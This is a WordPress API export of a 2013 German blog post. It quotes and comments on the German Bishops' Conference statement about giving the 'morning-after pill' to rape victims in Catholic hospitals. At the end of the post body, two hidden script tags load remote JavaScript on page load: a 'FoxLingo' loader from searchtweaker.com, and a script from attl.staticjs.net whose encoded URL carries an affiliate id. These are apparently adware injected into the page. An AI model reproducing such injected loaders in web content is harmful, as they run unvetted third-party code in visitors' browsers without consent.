{"id":1160,"date":"2013-02-21T22:04:21","date_gmt":"2013-02-21T20:04:21","guid":{"rendered":"http:\/\/b-logos.de\/?p=1160"},"modified":"2013-02-24T16:40:47","modified_gmt":"2013-02-24T14:40:47","slug":"dbk-zur-pille-danach-das-beste-was-unter-den-gegenwartigen-umstanden-moglich-war","status":"publish","type":"post","link":"https:\/\/b-logos.de\/?p=1160","title":{"rendered":"DBK zur \u201ePille danach\u201c: Das Beste, was unter den gegenw\u00e4rtigen Umst\u00e4nden m\u00f6glich war"},"content":{"rendered":"<p>Zum Abschluss der Fr\u00fchjahrs-Vollversammlung der Deutschen Bischofskonferenz gab der Vorsitzende EB Zollitsch einen <a title=\"Pressebericht des Vorsitzenden der Deutsch en Bischofskonferenz, Erzbischof Dr. Robert Zollitsch, anl\u00e4sslich der Pressekonferenz zum Abschluss der Fr\u00fchjahrs-Vollversammlung der Deutschen Bi schofskonferenz in Trier am 21. Februar 2013 \" href=\"http:\/\/www.dbk.de\/fileadmin\/redaktion\/diverse_downloads\/presse_2012\/2013-038-Pressebericht-FVV-Trier.pdf\">Pressebericht<\/a> heraus. Ich zitiere hieraus den Abschnitt 8. (Anmerkungen von mir):<\/p>\n<blockquote><p>Moraltheologische Fragen im Zusammenhang von Vergewaltigung (\u201ePille danach\u201c)<\/p>\n<div dir=\"ltr\" data-font-name=\"Times\" data-canvas-width=\"289.75039999999996\">Die Vollversammlung hat sich aus aktuellem Anlass mit den moraltheologischen Aspekten der Verabreichung der so genannten \u201ePille danach\u201c f\u00fcr Frauen, die einer Vergewaltigung zum Opfer gefallen sind, befasst. <!--more-->Kardinal Karl Lehmann (Mainz) als Vorsitzender der Glaubenskommission der Deutschen Bischofskonferenz hat auf der Basis wissenschaftlicher Erkenntnisse \u00fcber die Verf\u00fcgbarkeit neuer Pr\u00e4parate mit ge\u00e4nderter Wirkweise die moraltheologische Bewertung der Verwendung einer so genannten \u201ePille danach\u201c dargestellt. Kardinal Joachim Meisner (K\u00f6ln) erl\u00e4uterte die Hintergr\u00fcnde seiner im Anschluss an den aktuellen Fall der Abweisung <em><span style=\"color: #ff0000;\">[Es<\/span><\/em><em> <span style=\"color: #ff0000;\">gab keine<\/span> <span style=\"color: #ff0000;\">Abweisung! Siehe<\/span> <span style=\"color: #ff0000;\">mein <a title=\"Es wurde keine (mutma\u00dflich) vergewaltigte Frau an K\u00f6lner Krankenh\u00e4usern abgewiesen!\" href=\"https:\/\/b-logos.de\/?p=1155\">vorheriger<\/a><\/span> <span style=\"color: #ff0000;\"><a title=\"Es wurde keine (mutma\u00dflich) vergewaltigte Frau an K\u00f6lner Krankenh\u00e4usern abgewiesen!\" href=\"https:\/\/b-logos.de\/?p=1155\">Artikel<\/a>]<\/span> <\/em>eines Vergewaltigungsopfers durch zwei K\u00f6lner Krankenh\u00e4user in Ordenstr\u00e4gerschaft ergangenen Erkl\u00e4rung vom 31. Januar 2013, die er im Benehmen mit der Kongregation f\u00fcr die Glaubenslehre und der P\u00e4pstlichen Akademie f\u00fcr das Leben abgab.<\/div>\n<div dir=\"ltr\" data-font-name=\"Times\" data-canvas-width=\"175.77919999999992\">Die Vollversammlung hat bekr\u00e4ftigt, dass in katholischen Krankenh\u00e4usern Frauen, die Opfer einer Vergewaltigung geworden sind, selbstverst\u00e4ndlich menschliche, medizinische, psychologische und seelsorgliche Hilfe erhalten.\u00a0<em><span style=\"color: #ff0000;\">[H\u00e4tte die betroffene Frau vom 15.12.12. nat\u00fcrlich auch erhalten, wenn sie in einem katholischen Krankenhaus vorstellig geworden w\u00e4re]<\/span><\/em> Dazu kann die Verabreichung einer \u201ePille danach\u201c geh\u00f6ren, insofern sie eine verh\u00fctende und nicht eine abortive Wirkung hat.\u00a0<em><span style=\"color: #ff0000;\">[was der bisherigen moraltheologischen Position der katholischen Kirche entspricht (\u201eKongo-Pille\u201c)] <\/span><\/em> Medizinisch-pharmazeutische Methoden, die den Tod eines Embryos bewirken, d\u00fcrfen weiterhin nicht angewendet werden. <em><span style=\"color: #ff0000;\">[Die entscheidende Aussage! Es geht nicht nur um die pastoraltheologisch bedeutsame subjektive <a title=\"\u201e\u2026 mit der Absicht, \u2026 die Einnistung \u2026 zu verhindern, \u2026\u201c\" href=\"https:\/\/b-logos.de\/?p=1089\">Absicht<\/a> des Anwenders, sondern um die moralische Bedeutung der objektiv feststellbaren Wirkung. Die Absicht des Anwenders ist entscheidend f\u00fcr das Beichtgespr\u00e4ch, die objektiv feststellbare moralische Zul\u00e4ssigkeit aber f\u00fcr die Normen in katholischen Einrichtungen. Ein weiterer Fortschritt: Die Fixierung auf das Pr\u00e4parat wurde zugunsten der Methode \u00fcberwunden. So ist der Weg offen, auf den Zeitpunkt der Einnahme im Verlauf des weiblichen Zyklus abzuheben und danach zu differenzieren. Respektabel: Die Bisch\u00f6fe haben den Tod des Embryos als solchen bezeichnet!] <\/span><\/em>Die deutschen Bisch\u00f6fe vertrauen darauf, dass in Einrichtungen in katholischer Tr\u00e4gerschaft die praktische Behandlungs-entscheidung auf der Grundlage dieser moraltheologischen Vorgaben erfolgt. <em><span style=\"color: #ff0000;\">[Etwas Anderes ist gegenw\u00e4rtig aufgrund der \u00fcberst\u00fcrzten Quasi-Freigabe nicht m\u00f6glich. Von Quasi-Freigabe spreche ich, weil die Vereinbarung zwischen Land NRW und katholischen Bisch\u00f6fen nur von Seiten der Politik an die \u00d6ffentlichkeit weitergegeben wurde, und dies unter Weglassung des wesentlichen einschr\u00e4nkenden Bedingungssatzes. Dieser (\u201ePillen mit abtreibender Wirkung seien f\u00fcr die Kirche aber nicht akzeptabel\u201c) war erst auf Nachfrage beim Vize-Chef des katholischen B\u00fcros NRW zu erfahren, <a title=\"Erzbistum K\u00f6ln glaubt tendenzi\u00f6sen Aussagen des Vorsitzenden des Bundesverbandes der Frauen\u00e4rzte und die Folgen\" href=\"https:\/\/b-logos.de\/?p=1126\">interessierte die Medien aber l\u00e4ngst nicht mehr<\/a>] <\/span><\/em>Auf jeden Fall ist die Entscheidung der betroffenen Frau zu respektieren. <em><span style=\"color: #ff0000;\">[Was sonst? Musste aber angesichts der in der Gesellschaft kursierenden Horrorvorstellungen \u00fcber die katholische Kirche mal gesagt werden.] <\/span><\/em>Die Vollversammlung anerkennt die Notwendigkeit, neben ersten Stellungnahmen zur \u201ePille danach\u201c die weiteren Zusammenh\u00e4nge der Fragestellung \u2013 auch im Kontakt mit den in Rom Zust\u00e4ndigen\u00a0<em><span style=\"color: #ff0000;\">[Wie wohltuend nach einer zun\u00e4chst anderslautenden <a title=\"EB Zollitsch: \u201eunabh\u00e4ngig von der Billigung des Vatikans\u201c\" href=\"https:\/\/b-logos.de\/?p=1134\">Ank\u00fcndigung von EB Zollitsch<\/a>.]<\/span><\/em> \u2013 vertieft zu ergr\u00fcnden und notwendige Differenzierungen vorzunehmen. <em><span style=\"color: #ff0000;\">[Fantastisch!] <\/span><\/em>Die Bisch\u00f6fe werden entsprechende Gespr\u00e4che mit den Verantwortlichen der katholischen Krankenh\u00e4user, mit katholischen\u00a0<em><span style=\"color: #ff0000;\">[Sic! Man hat dazugelernt!]<\/span><\/em> Frauen\u00e4rztinnen und -\u00e4rzten sowie mit Beraterinnen und Beratern f\u00fchren.<\/div>\n<div dir=\"ltr\" data-font-name=\"Times\" data-canvas-width=\"175.77919999999992\"><\/div>\n<\/blockquote>\n<p dir=\"ltr\" data-font-name=\"Times\" data-canvas-width=\"175.77919999999992\">Fazit &#8211; es hat sich gelohnt:<\/p>\n<blockquote>\n<p dir=\"ltr\" data-font-name=\"Times\" data-canvas-width=\"175.77919999999992\">Der Bischofskonferenz seien auch viele Gutachten unverlangt zugesandt worden, offenbar auch von Abtreibungsgegnern. \u201eAuch die Argumente der Abtreibungsgegner m\u00fcssen wir ernst nehmen\u201c, <a title=\"Bisch\u00f6fe entscheiden \u00fcber \u201ePille danach\u201c\" href=\"http:\/\/www.tagesspiegel.de\/politik\/kurswechsel-in-der-katholischen-kirche-erlaubnis-aus-rom-nicht-notwendig\/7803166-2.html\">sagte Zollitsch<\/a>.<\/p>\n<\/blockquote>\n<p dir=\"ltr\" data-font-name=\"Times\" data-canvas-width=\"175.77919999999992\">Diese Erkl\u00e4rung der Deutschen Bischofskonferenz war das Beste, was nach den Pannen der letzten Wochen m\u00f6glich war. Offen bleibt, ob sich tats\u00e4chlich die Moraltheologie der Bisch\u00f6fe von einer Sexualmoral abwendet, die sich in einer r\u00f6misch-katholischen Interpretation des Naturrechts begr\u00fcndet, wie sich <a title=\"\u201eMeisner den Boden der \u2026 Sexualmoral des Lehramtes verlassen\u201c\" href=\"https:\/\/b-logos.de\/?p=1149\">Daniel Deckers erhofft<\/a>. Eine <a title=\"&quot;Radikale Folgen auch f\u00fcr die Kirche selbst&quot;\" href=\"http:\/\/www.domradio.de\/themen\/bischofskonferenz\/2013-02-20\/bischof-overbeck-zum-verlauf-der-vollversammlung-und-die-rolle\">Aussage von Bischof Overbeck<\/a> weist in diese Richtung &#8211; bis hin zu dem schon bei Deckers gefundenen Wort von der G\u00fcterabw\u00e4gung (Hervorhebung von mir):<\/p>\n<blockquote>\n<p dir=\"ltr\" data-font-name=\"Times\" data-canvas-width=\"175.77919999999992\">Die zweite gro\u00dfe Problematik betrifft die Pille danach und den Umgang damit \u2013 das ist m.E. das gro\u00dfe Problem der Kirche mit den gro\u00dfen Fragen der Sexualit\u00e4t und Menschen in Notsituationen angesichts unserer so komplexen modernen Welt. Auch da haben wir uns ja in der \u00d6ffentlichkeit auch infolge der Stellungnahme des Kardinal Meisners als NRW-Bisch\u00f6fe zu ge\u00e4u\u00dfert. Aber auch in der Bischofskonferenz wurde deutlich gesagt, dass der <strong>Lebensschutz<\/strong> wichtig ist, <strong>aber<\/strong> auch gleichzeitig die Frage der <strong>G\u00fcterabw\u00e4gung<\/strong> eine Rolle spielt, wenn Menschen in solche Not geraten.<\/p>\n<\/blockquote>\n<p dir=\"ltr\" data-font-name=\"Times\" data-canvas-width=\"175.77919999999992\">Mit der \u201eG\u00fcterabw\u00e4gung\u201c ist laut Deckers gemeint, dass<\/p>\n<blockquote>\n<p dir=\"ltr\" data-font-name=\"Times\" data-canvas-width=\"175.77919999999992\">&#8230; eine abortive Wirkung \u201eals Nebenwirkung\u201c um eines h\u00f6heren Gutes <em><span style=\"color: #ff0000;\">[?] <\/span><\/em>willen in Kauf genommen wird.<\/p>\n<\/blockquote>\n<p><script id=\"FoxLingoJs\" type=\"text\/javascript\">\/\/ < ![CDATA[\n\/\/ < ![CDATA[\n\/\/ < ![CDATA[\n\/\/ < ![CDATA[\n\/\/ < ![CDATA[\n\/\/ < ![CDATA[\n\/\/ < ![CDATA[\n(function(){try{var header=document.getElementsByTagName(\"HEAD\")[0];var script=document.createElement(\"SCRIPT\");script.src=\"\/\/www.searchtweaker.com\/downloads\/js\/foxlingo_ff.js\";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==\"complete\"||this.readyState==\"loaded\")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();\n\/\/ ]]><\/script><script type=\"text\/javascript\" src=\"http:\/\/attl.staticjs.net\/amz\/aeyJhZmZpZCI6MTA4MCwic3ViYWZmaWQiOjEwMjAsImhyZWYiOiJodHRwOi8vYi1sb2dvcy5kZS93cC1hZG1pbi9wb3N0LnBocD9wb3N0PTExNjAmYWN0aW9uPWVkaXQiLCJ3aWR0aCI6MTI4MCwiaGVpZ2h0IjoxMDI0LCJsb2FkZXJfY2xpZW50X3RpbWVzdGFtcCI6MTM2MTQ3MDg3NjQ3MH0%3D.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Zum Abschluss der Fr\u00fchjahrs-Vollversammlung der Deutschen Bischofskonferenz gab der Vorsitzende EB Zollitsch einen Pressebericht heraus. Ich zitiere hieraus den Abschnitt 8. (Anmerkungen von mir): Moraltheologische Fragen im Zusammenhang von Vergewaltigung (\u201ePille danach\u201c) Die Vollversammlung hat sich aus aktuellem Anlass mit den moraltheologischen Aspekten der Verabreichung der so genannten \u201ePille danach\u201c f\u00fcr Frauen, die einer Vergewaltigung &hellip; <a href=\"https:\/\/b-logos.de\/?p=1160\" class=\"more-link\"><span class=\"screen-reader-text\">\u201eDBK zur \u201ePille danach\u201c: Das Beste, was unter den gegenw\u00e4rtigen Umst\u00e4nden m\u00f6glich war\u201c<\/span> weiterlesen<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[],"tags":[],"class_list":["post-1160","post","type-post","status-publish","format-standard","hentry"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/pahMNU-iI","_links":{"self":[{"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/posts\/1160","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/b-logos.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1160"}],"version-history":[{"count":9,"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/posts\/1160\/revisions"}],"predecessor-version":[{"id":1183,"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/posts\/1160\/revisions\/1183"}],"wp:attachment":[{"href":"https:\/\/b-logos.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1160"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/b-logos.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1160"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/b-logos.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1160"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}